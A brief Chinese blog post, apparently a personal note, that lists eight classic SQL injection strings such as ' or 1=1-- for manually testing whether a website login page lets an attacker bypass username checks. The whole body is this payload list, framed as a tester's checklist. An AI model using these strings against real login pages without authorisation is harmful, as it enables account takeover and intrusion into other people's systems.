手抄:测试网站登录页面是否存在SQL注入攻击(手动测试语句)

  可尝试如下语句看是否可以绕过用户名验证机制:

  

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

 

posted @ 2022-04-25 09:50  Jason_huawen  阅读(143)  评论(0编辑  收藏  举报